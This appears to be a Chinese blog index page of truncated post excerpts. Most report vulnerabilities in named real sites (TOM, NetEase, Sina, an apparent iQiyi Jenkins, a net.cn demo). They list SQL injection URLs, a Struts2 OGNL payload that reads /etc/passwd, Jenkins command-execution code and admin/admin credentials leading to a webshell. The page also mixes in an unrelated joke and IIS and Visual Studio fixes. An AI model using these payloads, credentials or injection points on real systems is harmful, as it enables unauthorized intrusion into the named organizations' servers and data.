【1】 很久以前，那还是我用win98的时候有次我系统崩溃了，因为我是电脑白痴，我朋友给我介绍了一个高手来帮我修电脑。 他看了一下电脑，问我有没有98的盘，我说没有。 他想了一下，叫我把固定电话拿给他，我想修电脑要电话干什么，但人家是高手，我也不好说什么，就把电话拔下来给他了。 他把电话线空着的一头接在电脑的一个插孔内，然后进入了dos，然后就开始在电话上不停的按着键，他按键的速度非常快，但是只按…

报错提示如下：检测到在集成的托管管道模式下不适用的ASP.NET设置 一、解决方法（IIS设置） 将IIS程序池设置成经典模式 二、解决方法（修改代码） 修改web.config(以下面代码为例) <httpModules>   <add type="wqcms.URLRewriter.ModuleRewriter, wqcms_URLRewriter" name="Module…

Struts2最近问题频发，各大互联网大厂纷纷躺枪，这不TOM也来了~ 这次发现漏洞的站点是“TOM音乐互联”，好像是个废弃站点~ Struts2未升级，导致可Getshell 链接：http://211.100.40.155/website/applyCollectWebsite.action Getshell，如图

之前猪猪侠大牛爆的WordPress遍览用户的漏洞，一直想找个站点练练手，今天又在drops看到了利用脚本，于是就有了下文~ 因为本菜鸟主要是做前端的，所以经常光顾各大企业UED学习，发现几乎90%以上的UED站都是WordPress 搭建的，So，那就从UED开始吧~ 以下为常见互联网大厂UED系统： http://ued.sina.com.cn/ http://udc.weibo.com ht…

1、注入点：http://sms.tom.com/pk12530/ub/news_admin/index.php?id=18 ，如图 2、注入点：http://m.tom.cn/appweb/book/xiazai.jsp?s=116 ，如图

网易某系统命令执行，经典Struts2漏洞复现，如下图： http://analytics.ws.netease.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,…

http://220.181.109.120:8080/ Jenkins平台，未授权访问，应该是奇艺的，看图： 还可以直接执行命令呢，继续深入的话可渗透内网(未授权不敢测试) Runtime runtime = Runtime.getRuntime(); Process process = runtime.exec("id"); process.getInputStream(); Buffered…

注入点： http://dota2db.games.sina.com.cn/?a=hero_info&id=10487

在安装完Visual Studio经常会遇到一个问题是，在打开IE或浏览网页的时候,都会出现iexplore.exe[XXXX]发生了未经处理的win32异常，还调Visual Studio用户要么启动实时调试,用户要么启动实时调试，要么忽略该异常.非常麻烦，网上也讲了好多解决办法，什么在visual studio(工具-选项-调试-实时-把右边那些本机\脚本\托管)这些钩都去掉等等，我试过了不还…

http://b131.demo.www.net.cn/admin/login.aspx 万网分销宝系统 用户名密码都是admin，进入后台可得shell ，如图 菜刀连接 同服很多分站，貌似都是测试模板